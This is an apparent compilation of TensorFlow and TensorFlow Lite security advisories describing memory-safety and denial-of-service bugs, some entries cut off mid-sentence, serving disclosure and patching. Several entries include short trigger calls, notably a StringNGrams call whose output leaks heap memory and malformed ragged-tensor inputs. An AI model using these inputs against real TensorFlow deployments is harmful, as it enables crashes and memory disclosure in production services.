In TensorFlow Lite, models using segment sum can trigger writes outside of bounds of heap allocated buffers by inserting negative elements in the segment ids tensor: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reference_ops.h#L2625-L2631 Users having access to segment_ids_data can alter output_index and then write outside of the output_data buffer. This might result in a segmentation fault but it can also be used to further corrupt the memory and can be chained with other vulnerabilities to create …

Out of bounds access in tensorflow-lite

In TensorFlow Lite, saved models in the flatbuffer format use a double indexing scheme: a model has a set of subgraphs, each subgraph has a set of operators and each operator has a set of input/output tensors. The flatbuffer format uses indices for the tensors, indexing into an array of tensors that is owned by the subgraph. This results in a pattern of double array indexing when trying to get …

Null pointer dereference in tensorflow-lite

A crafted TFLite model can force a node to have as input a tensor backed by a nullptr buffer. This can be achieved by changing a buffer index in the flatbuffer serialization to convert a read-only tensor to a read-write one. The runtime assumes that these buffers are written to before a possible read, hence they are initialized with nullptr: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/core/subgraph.cc#L1224-L1227 However, by changing the buffer index for a tensor …

Memory leak in Tensorflow

If a user passes a list of strings to dlpack.to_dlpack there is a memory leak following an expected validation failure: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L100-L104 The allocated memory is from https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L256 The issue occurs because the status argument during validation failures is not properly checked: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L265-L267 Since each of the above methods can return an error status, the status value must be checked before continuing.
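
A sketch of the triggering pattern (the list contents are arbitrary): the call fails with the expected validation error, but on affected versions the buffer allocated before the failed check is never released, so repeating the call leaks memory.

import tensorflow as tf

# Passing a list of strings instead of a tensor; the conversion is rejected,
# but the already-allocated DLPack buffer is leaked on affected versions.
try:
    tf.experimental.dlpack.to_dlpack(["a", "b", "c"])
except Exception as err:
    print(err)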

Memory corruption in Tensorflow

The implementation of dlpack.to_dlpack can be made to use uninitialized memory resulting in further memory corruption. This is because the pybind11 glue code assumes that the argument is a tensor: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/python/tfe_wrapper.cc#L1361 However, there is nothing stopping users from passing in a Python object instead of a tensor. In [2]: tf.experimental.dlpack.to_dlpack([2]) ==1720623==WARNING: MemorySanitizer: use-of-uninitialized-value

Integer truncation in Shard API usage

The Shard API in TensorFlow expects the last argument to be a function taking two int64 (i.e., long long) arguments https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/util/work_sharder.h#L59-L60 However, there are several places in TensorFlow where a lambda taking int or int32 arguments is being used https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L204-L205 https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L317-L318 In these cases, if the amount of work to be parallelized is large enough, integer truncation occurs. Depending on how the two arguments of the lambda are used, this …

Heap buffer overflow in Tensorflow

The SparseCountSparseOutput and RaggedCountSparseOutput implementations don't validate that the weights tensor has the same shape as the data. The check exists for DenseCountSparseOutput, where both tensors are fully specified: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L110-L117 In the sparse and ragged count implementations, weights are still accessed in parallel with the data: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L199-L201 But, since there is no validation, a user passing fewer weights than the values for the tensors can generate a read from outside the …
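
A sketch of the mismatch described above, with hypothetical argument values (five values but only two weights), using the ragged variant:

import tensorflow as tf

# Hypothetical shapes: fewer weights than values, a mismatch the ragged and
# sparse variants do not validate on affected versions.
tf.raw_ops.RaggedCountSparseOutput(
    splits=tf.constant([0, 5], dtype=tf.int64),
    values=tf.constant([1, 2, 3, 4, 5], dtype=tf.int32),
    weights=tf.constant([1.0, 2.0]),
    binary_output=False)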

Heap buffer overflow in Tensorflow

The RaggedCountSparseOutput implementation does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the values in the splits tensor generate a valid partitioning of the values tensor. Hence, this code is prone to heap buffer overflow: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L248-L251 If split_values does not end with a value that is at least num_values, then the while loop condition will trigger a read outside of the bounds …

Heap buffer overflow in Tensorflow

The SparseCountSparseOutput implementation does not validate that the input arguments form a valid sparse tensor. In particular, there is no validation that the indices tensor has the same shape as the values one. The values in these tensors are always accessed in parallel: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L193-L195 Thus, a shape mismatch can result in accesses outside the bounds of heap allocated buffers.

Denial of service in tensorflow-lite

In TensorFlow Lite, models using segment sum can trigger a denial of service by causing an out of memory allocation in the implementation of segment sum. Since code uses the last element of the tensor holding them to determine the dimensionality of the output tensor, attackers can use a very large value to trigger a large allocation: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/segment_sum.cc#L39-L44

Denial of Service in Tensorflow

By controlling the fill argument of tf.strings.as_string, a malicious attacker is able to trigger a format string vulnerability due to the way the internal format string used in a printf call is constructed: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/as_string_op.cc#L68-L74 This can result in unexpected output: In [1]: tf.strings.as_string(input=[1234], width=6, fill='-') Out[1]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['1234 '], dtype=object)> In [2]: tf.strings.as_string(input=[1234], width=6, fill='+') Out[2]: <tf.Tensor: shape=(1,), dtype=string, numpy=array([' +1234'], dtype=object)> In [3]: tf.strings.as_string(input=[1234], width=6, fill="h") Out[3]: <tf.Tensor: …
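
A caller-side wrapper can reject surprising fill characters before they reach the op; this is only a sketch with an illustrative allow-list, not the upstream fix, and safe_as_string is a hypothetical helper:

    import tensorflow as tf

    SAFE_FILL = {"", " ", "0", "-", "+"}   # illustrative allow-list, not the upstream fix

    def safe_as_string(values, width, fill):
        # Refuse fill characters that could change the printf-style format
        # string in unexpected ways.
        if fill not in SAFE_FILL:
            raise ValueError("unsupported fill character: %r" % fill)
        return tf.strings.as_string(values, width=width, fill=fill)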

Denial of Service in Tensorflow

The SparseCountSparseOutput implementation does not validate that the input arguments form a valid sparse tensor. In particular, there is no validation that the indices tensor has rank 2. This tensor must be a matrix because the code accesses its elements as elements of a matrix: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L185 However, malicious users can pass in tensors of different rank, resulting in a CHECK assertion failure and a crash. This can be used …

Denial of Service in Tensorflow

The RaggedCountSparseOutput implementation does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the splits tensor has the minimum required number of elements. The code uses this quantity to initialize a different data structure: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L241-L244 Since BatchedMap is equivalent to a vector, it needs to have at least one element to not be nullptr. If a user passes a splits tensor that is empty …

Denial of Service in Tensorflow

The SparseFillEmptyRowsGrad implementation has incomplete validation of the shapes of its arguments: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L235-L241 Although reverse_index_map_t and grad_values_t are accessed in a similar pattern, only reverse_index_map_t is validated to be of proper shape. Hence, malicious users can pass a bad grad_values_t to trigger an assertion failure in vec, causing a denial of service in serving installations.
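
The missing symmetry, sketched at the Python level over NumPy arrays (check_grad_values is a hypothetical helper, and the indexing relationship is an assumption about the op's gradient semantics): both arguments are read through a rank-1 view, so both should be validated before the kernel runs.

    import numpy as np

    def check_grad_values(reverse_index_map, grad_values):
        # Sketch of the missing checks, assuming reverse_index_map entries are
        # used as indices into grad_values.
        if reverse_index_map.ndim != 1 or grad_values.ndim != 1:
            raise ValueError("both arguments must be rank-1 (vectors)")
        if np.any(reverse_index_map < 0) or np.any(reverse_index_map >= grad_values.shape[0]):
            raise ValueError("reverse_index_map contains out-of-range indices")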

Denial of Service in Tensorflow

Changing TensorFlow's SavedModel protocol buffer and altering the name of required keys results in segfaults and data corruption while loading the model. This can cause a denial of service in products using tensorflow-serving or other inference-as-a-service installations. We have added fixes to this in f760f88b4267d981e13f4b302c437ae800445968 and fcfef195637c6e365577829c4d67681695956e7d (both going into TensorFlow 2.2.0 and 2.3.0 but not yet backported to earlier versions). However, this was not enough, as #41097 reports …

Data leak in Tensorflow

The data_splits argument of tf.raw_ops.StringNGrams lacks validation. This allows a user to pass values that can cause heap overflow errors and even leak contents of memory >>> tf.raw_ops.StringNGrams(data=["aa", "bb", "cc", "dd", "ee", "ff"], data_splits=[0,8], separator=" ", ngram_widths=[3], left_pad="", right_pad="", pad_width=0, preserve_short_sequences=False) StringNGrams(ngrams=<tf.Tensor: shape=(6,), dtype=string, numpy= array([b'aa bb cc', b'bb cc dd', b'cc dd ee', b'dd ee ff', b'ee ff \xf4j\xa7q\x7f\x00\x00q\x00\x00\x00\x00\x00\x00\x00\xd8\x9b~\xa8q\x7f\x00', b'ff \xf4j\xa7q\x7f\x00\x00q\x00\x00\x00\x00\x00\x00\x00\xd8\x9b~\xa8q\x7f\x00 \x9b~\xa8q\x7f\x00\x00p\xf5j\xa7q\x7f\x00\x00H\xf8j\xa7q\x7f\x00\x00\xf0\xf3\xf7\x85q\x7f\x00\x00}\xa6\x00\x00\x00\x00\x00\xa6\x00\x00\x00\x00\x00\xb0\xeb\x9bq\x7f\x00'],… All the binary strings after ee ff …
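
For contrast, a well-formed call partitions exactly the six strings that are present, so the splits end at 6 rather than 8 (this sketch reuses the signature shown above):

    import tensorflow as tf

    # Six input strings, so the (single) batch is described by splits [0, 6];
    # the malicious call above ends its splits at 8, past the end of data.
    tf.raw_ops.StringNGrams(data=["aa", "bb", "cc", "dd", "ee", "ff"],
                            data_splits=[0, 6], separator=" ", ngram_widths=[3],
                            left_pad="", right_pad="", pad_width=0,
                            preserve_short_sequences=False)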

Data corruption in tensorflow-lite

When determining the common dimension size of two tensors, TFLite uses a DCHECK, which is a no-op outside of debug compilation modes: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/types.h#L437-L442 Since the function always returns the dimension of the first tensor, malicious attackers can craft cases where this is larger than that of the second tensor. In turn, this would result in reads/writes outside of bounds since the interpreter will wrongly assume that there is enough data in …
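
Conceptually, the helper behaves like the following Python rendering (a sketch, not the actual C++): the equality check vanishes in release builds, so the first tensor's dimension is returned unconditionally.

    def matching_dim(shape1, i1, shape2, i2):
        # This assert stands in for the DCHECK; in release builds the DCHECK
        # compiles away and the function simply trusts shape1.
        assert shape1[i1] == shape2[i2]
        return shape1[i1]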

Segmentation fault in TensorFlow when converting a Python string to `tf.float16`

Converting a string (from Python) to a tf.float16 value results in a segmentation fault in eager mode as the format checks for this use case are only in graph mode. This issue can lead to a denial of service in inference/training, where a malicious attacker can send a data point that contains a string instead of a tf.float16 value. Similar effects can be obtained by manipulating saved models and checkpoints …
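
A caller-side guard (a hypothetical helper, not the upstream fix) can parse the value in Python before it ever reaches the eager conversion path:

    import tensorflow as tf

    def to_float16(value):
        # Reject non-numeric inputs before constructing the tf.float16 tensor.
        try:
            numeric = float(value)
        except (TypeError, ValueError):
            raise ValueError("expected a numeric value, got %r" % (value,))
        return tf.constant(numeric, dtype=tf.float16)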

2019

Heap buffer overflow in `UnsortedSegmentSum` in TensorFlow

A heap buffer overflow in UnsortedSegmentSum can be produced when the Index template argument is int32. In this case, the data_size and num_segments fields are truncated from int64 to int32 and can produce negative numbers, resulting in out-of-bounds heap memory accesses. This is unlikely to be exploitable and was detected and fixed internally. We are issuing this security advisory only to notify users that it is better to update …